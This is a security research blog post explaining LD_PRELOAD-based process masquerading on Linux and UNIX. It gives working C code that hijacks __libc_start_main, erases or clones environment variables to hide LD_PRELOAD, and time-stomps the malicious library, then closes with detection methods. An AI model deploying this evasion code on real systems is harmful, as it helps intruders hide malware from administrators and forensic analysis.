Hiding in plain sight (part 2) - Abusing the dynamic linker

A stealthy process stomping method compatible with UNIX-like systems with anti-forensic enhancements for Linux.

Hiding in plain sight (part 2) - Abusing the dynamic linker
SolarOS (a play on SunOS which would become Solaris) featured in the Disney movie Tron Legacy.

Introduction

This post details a defence evasion technique that overcomes a pitfall on Solaris and the BSDs, discussed in part 1. The technique is extended to Linux with additional anti-forensic behaviours to provide additional stealth, such as removing evidence of LD_PRELOAD. Detection opportunities are discussed. The final product can be found here.

In part 1 of the "Hiding in plain sight" series, we looked at a a common defence evasion technique to dynamically change a process name for the means of "process stomping" or "process masquerading". In Linux, it is trivial to overwrite the argument vector and change the processes' internal thread name with the prctl system call. The resulting outcome is that tools such as ps show a different process name then that of the initial executable name. In the other UNIX-like systems we looked at, the equivalent prctl that can modify the process thread name is not available. As a result, utilities such as ps or top will show a tampered argv[0], although the (truncated) filename of the running process (comm) remains. As a result, the masquerading fails.

$ ./main &

$ ps -ef -ocomm,args | grep stomped
main    stomped (main)

argv modified, although comm can't be changed (FreeBSD)

The technique described next has been observed to be used by threat actors in order to overcome this limitation on systems such as Solaris by "borrowing" both argv[0] and comm from a common process by hijacking main() through the use of LD_PRELOAD. If we apply the method in Linux and take advantage of the ability to also tamper with the environment variables - this becomes quite a stealthy technique. Consider the following:

  • The process name inherits that of another legitimate executable: both /proc/[pid]/comm and /proc/[pid]/cmdline
  • The symbolic link/proc/[pid]/exe reflects that of the legitimate binary
    • This symbolic link can't trivially be changed and is often a very valuable artefact used to detect process masquerading. Not in this case.
  • The environment variable key LD_PRELOAD is removed
    • Additionally, inherited environment variables from the parent process (e.g. a bash) is zeroed out and replaced, hindering memory acquisition.
  • No ptrace system call for process injection

In regards to detecting this technique - a reliable method is telemetry on system calls: despite removing the LD_PRELOAD string from the process memory, the envp argument in the execve system call will have an occurrence of LD_PRELOAD. Additionally, if the malicious shared object is a 'known bad', /proc/[pid]/maps will reveal it.

The playbook

First let's take a look at how this all looks, then we will dig into the theory.

A common process on the compromised system is chosen. Let's go with systemd-logind. The threat actor runs the following sequence of commands:

$ LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libm.so.5 /lib/systemd/systemd-logind &
$ disown $!
$ systemctl restart systemd-logind
$ exit

An overworked administrator (with a very keen eye) logs in to do a routine health check. They note that there is two instances of systemd-logind, but nothing else appears out of place. Regardless, they dig in a little further.

 $ ps  -eo pid,ppid,tty,comm,cmd | grep systemd-login
   1818       1 ?        systemd-logind  /lib/systemd/systemd-logind
   1917       1 ?        systemd-logind  /lib/systemd/systemd-logind   

Check environment variables between the two:

$ paste -d'\t' <(strings /proc/1917/environ) <(strings /proc/1637/environ)

LANG=en_US.UTF-8        LANG=en_US.UTF-8
PATH=/usr/local/sbin    PATH=/usr/local/sbin
WATCHDOG_PID=1917       WATCHDOG_PID=1917
JOURNAL_STREAM=8        JOURNAL_STREAM=8
SYSTEMD_EXEC_PID=1917   SYSTEMD_EXEC_PID=1917
...

Double checking, they are the same:

$ diff /proc/1917/environ /proc/1637/environ
$

How about the executable file? Also the same:

$ readlink /proc/1917/exe
/usr/lib/systemd/systemd-logind

$ readlink /proc/1637/exe
/usr/lib/systemd/systemd-logind

Are they the same thing? How about the mapped memory?

$ diff <(cat /proc/1637/maps | awk '{print $6}' | sort -u) <(cat /proc/1917/maps | awk '{print $6}' | sort -u)
 
21d20
< /usr/lib/x86_64-linux-gnu/libm.so.5
22a22
> /usr/lib/x86_64-linux-gnu/libnss_systemd.so.2

So they have a slight difference in what shared libraries are loaded. Which one is the malicious one?

$ ls -al  /usr/lib/x86_64-linux-gnu/ | egrep "libm.so|libnss_systemd"
-rw-r--r--  1 root root      140 Apr 30 17:07 libm.so
-rwxr-xr-x  1 root root    16496 Apr 30 17:07 libm.so.5
-rw-r--r--  1 root root   907784 Apr 30 17:07 libm.so.6
-rw-r--r--  1 root root   325904 Jun 16 05:44 libnss_systemd.so.2

The answer is the one with the birth time of the date this blog page was published:

$ stat /usr/lib/x86_64-linux-gnu/libm.so.5
  ...
Access: 2024-08-02 01:55:18.613844475 -0400
Modify: 2024-04-30 17:07:28.000000000 -0400
Change: 2024-08-02 01:54:32.521378007 -0400
 Birth: 2024-08-02 01:50:19.050898356 -0400

The malicious library was time stomped, with the mtime cloned from another shared object file in the same directory.

$ touch -r ./libm.so.6 ./libm.so.5

As always, never rely on the (default) timestamp from ls.

Here libm.so.5 was loaded by the process with the PID 1818. In our example, the real systemd-logind had a higher pid of 1917. Normally this would be a lower value as it's a systemd service that is started on bootup... but did you note the sneaky restart systemd-logind command thrown in?

💡
As I was reviewing this post, it became apparent that there is one artefact that emerges (with the env vars) when systemd-logind is masqueraded in this manner that indicates something is very off. Can you spot it?

And to double check, there is no LD_PRELOAD environment variable in any process, nor the existence of ld.so.preload (common technique with userspace rootkits)

$ ps eaux | cat | grep LD_PRELOAD  | grep -v grep
$

$  ls /etc/ld.so.preload
ls: cannot access '/etc/ld.so.preload': No such file or directory

One final check, dumping the virtual memory of the stack:

$ cat /proc/2183/maps | grep stack
7ffcc6620000-7ffcc6641000 rw-p 00000000 00:00 0                          [stack]

$ gdb --pid 2183
(gdb) dump memory /tmp/stack.dump 0x7ffcc6620000 0x7ffcc6641000

We would expect to see LD_PRELOAD and the inherited environment variables from the parent shell that would indicate the process was invoked from an interactive session - commonly used for forensic analysis, such as SSH_CLIENT, MAIL, TERM etc. But here, nothing of the sort:

$ strings /tmp/stack.dump | egrep "LD_PRELOAD|TERM|SSH_CLIENT|MAIL"
$
💡
If your playing along at home on an interactive desktop (e.g. X session), rather then a SSH connection / terminal over the network, you may note the parent PID is different, as thanks to systemd, disown will reparent the process systemd --user and not /sbin/init. Thanks again, systemd for continuing to spoil things.

LD_PRELOAD

The job of the dynamic (run-time) linker is figure out what libraries need to be loaded and to link them into the executable at run time. It resolves symbols (such as function names) in shared libraries and performing the necessary relocations (e.g. "this function is at this address"). The environment variable LD_PRELOAD tells the dynamic linker to load a shared object of our choosing, rather then one found in the default paths. If that shared object exports the function with the same name, as another that exits, the LD_PRELOAD will take preference. This also applies for "constructor" directives with gcc and clang. Abuse of LD_PRELOAD is an age old technique employed in user space rootkits often to backdoor libc functions and is particularly easy to detect.

The objective of using LD_PRELOAD in the context of the technique discussed here is to replace the user defined main function of a legitimate program at runtime with malicious code at run-time in order to inherit the legitimate program's attributes such as it's process name.

Two ways to achieve this is to do the following in a shared library:

  • Decorate the new main with the directive __attribute__(constructor)))
  • Hook into __libc_start_main to replace the the function pointer from the original main to a new one, or alternatively, replace the init parameter.
💡
By convention, in the following examples, will use the function name premain to mean the malicious code that replaces the original main.

The start_main approach

This method works in Linux - hook into libc_start_main and then transfer control to premain. The first argument to libc_start_main is a function pointer to main, so here it could simply be swapped with premain.

int __libc_start_main(
  main, argc, envp, 
  init, fini, 
  stack_end
);

The alternative is to set the fourth argument, init, to the address of premain. As we will understand better in the next section, the difference here is that with init hijacked no other constructors will be run and other initialization routines (such as the auxiliary vector) which might be a consideration.

In order to hook into libc_start_main, it's address is obtained by calling dlsym with the first argument, handle set to RTLD_NEXT. The 'real' libc_start_main is then called, passing on every argument untouched except for the main address (or alternatively, init):

int premain(int argc, char **argv, char **envp) {
    ...
}

int __libc_start_main(int (*main)(int, char **, char **), .. ) {
    
    typeof(&__libc_start_main) orig = dlsym(RTLD_NEXT, "__libc_start_main");
    return orig(premain, argc, argv, init, ...);
}

Our final example code will use the this approach.

The "constructor" approach

The second method should work on both Linux and other UNIX-like systems such as Solaris and FreeBSD. A function in the shared library can be decorated with a directive to make code that function execute upon loading of the library, before transfer is controlled to the main of the program. A final exit system call is used avoid eventual transfer of control to the real main.

__attribute__((constructor()))
void premain() {
    printf("In premain()\n");
    exit(0);
}

The rest of this section can be skimmed over unless the details are of interest to you.

A diagram to help illustrate what is happening (on recent gcc / glibc). The exit() supresses control flow back to the real main.

The internals on how how constructors are implemented really depends on version ofgcc and glibc version. If you are reading up and researching this topic and your elf files look or behave different to what is being documented, it's probably because it's outdated information that does not apply to your toolchain. On the latest gcc versions, the list of function pointers to constructors are stored in the section .init_array. In recent glibc versions, function call_init is responsible for enumerating and executing each constructor.

elf files will contain the .init section (_init) although this is an older initialization mechanism and is probably not used. A quick look at some differences. In the following examples, the following has been compiled and executed:

#include <stdio.h>

__attribute__((constructor()))
void premain() {
  printf("in premain()\n");
  return;
}

int main() {
  return 0;
}

Breaking on premain and doing a backtrace in gdb on gcc 11.4.0, ldd (glibc 2.35) on Ubuntu 22.04 (trimmed for brevity):

(gdb) bt
#0  premain () at main.c:5
#1  0x00007ffff7daeebb in call_init .... at ../csu/libc-start.c:145
#2  __libc_start_main_impl ... at ../csu/libc-start.c:379
#3  0x0000555555555085 in _start ()

The same backtrace in gdb on gcc 4.1.2, ldd (GNU libc) 2.5 on RHEL 5.4:

(gdb) bt
#0  premain () at test.c:5
#1  0x0000000000400576 in __do_global_ctors_aux ()
#2  0x0000000000400383 in _init ()
#3  0x0000000000000001 in ?? ()
#4  0x00000000004004f7 in __libc_csu_init ()
#5  0x00000035b5a1d92e in __libc_start_main () from /lib64/libc.so.6
#6  0x00000000004003e9 in _start ()
💡
Why the difference?

glibc 2.3.3 and earlier used __libc_csu_init which was statically compiled into the executable. As a result a ROP gadget "return-to-csu" was discovered and the mitigation was to move this functionally out into glibc, into call_init.

What is relevant in this discussion is how backwards compatibility is maintained with this change and how it could be leveraged. If we look at the commit comment for this change:

For maximum backwards compatibility, this is not changed, and instead, the main map is consulted from __libc_start_main if the init function argument is a NULL pointer.

In other words, on newer gcc compiled binaries, the init parameter in __libc_start_main will beNULL, so then the dynamic linker will choose the external glibc constructor loading routine which will find the constructor list in the .init_array section. Here we can see in the disassembly at the entry point _start, gcc has emitted xor ecx, ecx, a NULL for the init argument;

If the init parameter is not NULL, it's dealing with an older compiled binary, so it will fallback to the statically compiled __libc_csu_init. The disassembly of _start on the older gcc 4.2:

__libc_csu_init which will make its way to _do_global_ctors_aux that will walk through the constructors found in the (now deprecated) .ctors section.

💡
When there is more then one constructor, priorities that dictate the order of execution can be assigned by passing in an integer value between 101 and 65535 with 101 being the highest priority (e.g. constructor(101)). The dynamic linker will give highest precedence and execute any decorated constructor in a library loaded withLD_PRELOAD above all others, even if it's priority value is explicitly the lowest. For that reason, we really do not need to consider the priority argument.

Tampering with the environment variables

But the biggest give away is that the string LD_PRELOAD will appear as an environment variable for the process:

$ cat /proc/6797/environ  | tr '\0' '\n'
LD_PRELOAD=./bad.so
SHELL=/bin/bash
COLORTERM=truecolor
...

And with the appropriate ps flags:

$ ps e -ww -p 6797
    PID TTY      STAT   TIME COMMAND
   6797 ?        S      0:00 /sbin/auditd LD_PRELOAD=./bad.so SHELL=/bin/bash COLORTERM=truecolor ...

glibc offers two functions that play with the environment variables, although contrary to their names, they do not achieve what we are after. unsetenv("LD_PRELOAD") or clearenv does not work as expected.

These standard library functions work on a global variable environ, defined in posix/environ.c, a pointer to an array of characters:

char **__environ = NULL;
weak_alias (__environ, environ)

In libc_init_first

__libc_init_first (int argc, char **argv, char **envp) {
   ...
   __libc_argc = argc;
   __libc_argv = argv;
   __environ = envp;
   ...
}

As we see in stdlib/setenv.c, clearenv() set's this to NULL:

/* Clear the environment pointer removes the whole environment.  */
__environ = NULL;

Setting this to NULL just changes the value of the pointer environ, an initialized global variable within the process's data segment. The environment variables will appear cleared from the perspective of any glibc function called from the process that touches environ, but what is wanted is for other processes to "see the same" thing.

Utilities such as ps read from /proc/[pid]/environ which reads from the virtual memory regions of the process when the process was created (or modified with prctl) and in the case of the environment variables, it is specifically pages of memory between the mm->env_start andmm->env_end. As seen in the implementation in the kernel for environ_read()

static ssize_t environ_read(struct file *file, ...)
{
    ...
    struct mm_struct *mm = file->private_data;
    ...
	env_start = mm->env_start;
	env_end = mm->env_end;
    ...
        this_len = env_end - (env_start + src);
        retval = access_remote_vm(mm, (env_start + src), page, this_len, FOLL_ANON);
    ...

/fs/proc/base.c

So unsetenv() will have no effect on anything that reads from /proc/[pid]/environ such as ps.

So what are our options?

  • Overwrite the bytes in the region where the environment variables are stored. Here it could be new values or NULL values.
  • Call prctl with PR_SET_MM_ENV_START / PR_SET_MM_ENV_END, with a new address range

The first option to overwrite the existing memory is ideal as will remove artifacts remaining in the process's stack for when memory acquisition is done. Using the second option with prctl is ideal if the environment variable list size will possibly be increased and we don't want to risk corrupting the stack. On Linux - then we do both. On other platforms where the equivalent of prctl is not available, we just overwrite the space in the stack.

If we just call prctl and don't overwrite the memory, the data is still resident and can be acquired:

$ cat /proc/2183/maps | grep stack
7ffd71f32000-7ffd71f53000 rw-p 00000000 00:00 0                          [stack]

$ gdb --pid 2183
(gdb) dump memory /tmp/stack.dump 0x7ffd71f32000 0x7ffd71f53000

$ strings /tmp/stack.dump | egrep "LD_PRELOAD|SSH_CLIENT"
LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libm.so.5
SSH_CLIENT=192.168.56.1 62336 22

Reimplementing "clearenv"

Here we need to determine start and end address and overwrite everything NULL values. glibc provides the pointer environ which can be accessed as a global variable with extern char **environ

💡
As the environment variables are placed after the arguments in the stack, the start address could alternatively be accessed with &argv[argc+1]

We have the start address, to calculate the end address, the size of each string pointed to by each element in env can be determined with strlen. Summing up the length of each string (including /0 will give us the end address. bzero is then called to overwrite every byte:

void clearenv2() {
    int len = 0;
    char **env = environ;
    while(*env)
       len += strlen(*env++)+1;
   bzero(*environ,len);
}

The following diagram taken from part 1 in this series may serve as a helpful visualization:

upload in progress, 0

Putting it all together, so far we have:

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
#include <string.h>

extern char **environ;

void clearenv2() {
    int len = 0;
    char **env = environ;
    while(*env)
       len += strlen(*env++)+1;
   bzero(*environ,len);
}

int hook(int argc,char**argv, char**envp) {
  printf("in hook().. sleeping...\n");
  sleep(100);
  return 0;
}

int __libc_start_main(
    int (*main)(int, char **, char **),
    int argc,
    char **argv,
    int (*init)(int, char **, char **),
    void (*fini)(void),
    void (*rtld_fini)(void),
    void *stack_end)
{

    clearenv2();

    typeof(&__libc_start_main) orig = dlsym(RTLD_NEXT, "__libc_start_main");
    return orig(hook, argc, argv, init, fini, rtld_fini, stack_end);
}
gcc main.c -o bad.so -fpic -shared
$ LD_PRELOAD=./bad.so /lib/systemd/systemd-logind  &
[1] 7597
$ in hook().. sleeping...
  
$  cat /proc/7597/environ 
 
$ ps e -ww -p 7597
    PID TTY      STAT   TIME COMMAND
   7597 pts/1    S      0:00 /lib/systemd/systemd-logind

An improvement

As an improvement, we could have taken the same environment variables of the real systemd-logind and copy them over the existing ones rather then wipe them out. Here caution would be needed not to exceed the allocated space. If the running process did not have root privileges, calling prctl with PR_SET_MM_MAP would be required (as described in part1). To keep things simple, let's assume the user is root

Our clone_env traverses /proc/[pid]/environ. Since "files" in /proc do not have a file size, and we do not know how much memory needs to be allocated to store the processes environment variables, one approach is realloc until read returns EOF. This is the approach that ps and other utilities in the psproc package use. prctl(PR_SET_MM,PR_SET_MM_ENV_{START|END},...) is then called, passing in the start and end address of the buffer storing the copied environment variables:

void clone_env(pid_t pid) {
    ...
    snprintf(path, sizeof(path),"/proc/%d/environ", pid);
    fd = open(path,O_RDONLY,0);
    ...
    envl = 0;
    while ((n = read(fd,buf, sizeof(buf))) > 0) {
      rbuf = realloc(rbuf, envl + n);
      ...
      memcpy(rbuf+envl, buf, n);
      envl += n;
    }

    prctl(PR_SET_MM, PR_SET_MM_ENV_START, rbuf, 0,0);
    prctl(PR_SET_MM, PR_SET_MM_ENV_END, rbuf+envl, 0,0);
}

Obtaining the pid to pass into clone_env is rather straight forward, enumerate each process in /proc and match on the first process that has the matching comm string (except the entry for the current process):

pid_t getpidbycomm(const char *comm) {
  ...
  pid_t me = getpid();

  dir = opendir("/proc");
  ...
  while((ent = readdir(dir)) != NULL) {
    cpid = atoi(ent->d_name);
    if (!cpid || cpid == me)
      continue;

    snprintf(path,sizeof(path), "/proc/%d/comm", cpid);
    fd = open(path, O_RDONLY, 0);
    n = read(fd,buf, sizeof(buf));
    close(fd);
    buf[n-1] = '\0'; // rtrim \n 
    if (strcmp(comm, buf) == 0) {
      closedir(dir);
      return atoi(ent->d_name);
    }

Bringing it all together, the basename of the program being run is taken from argv[0] to be matched in getpidbycomm:

int __libc_start_main(..) {
  clearenv2();
  char *name = basename(argv[0]);
  pid_t p = getpidbycomm(name);
  clone_env(p);
    ...
  }

You can find the final product 'procscope.c' here

Detection

If there is the possibility to capture system calls then the envp argument will contain the LD_PRELOAD string. Here bpftrace is used:

$  bpftrace -e 'tracepoint:syscalls:sys_enter_execve {
    printf("%d %s ", tid, str(args->argv[0]));
    join(args->envp);
 }'
Attaching 1 probe...

63227 /usr/libexec/ibus-portal LD_PRELOAD=./main.so SHELL=/bin/bash <CUT>

Osquery, Falco, all the common EDRs that work in the kernel will certainly detect this. Paths of shared libraries can be enumerated with lsof, and if bad knowns can be matched (filenames, hashes). In absence of these capabilities, then detection may rely on other behaviour of the malicious code (network connectivity, file activity, open sockets etc).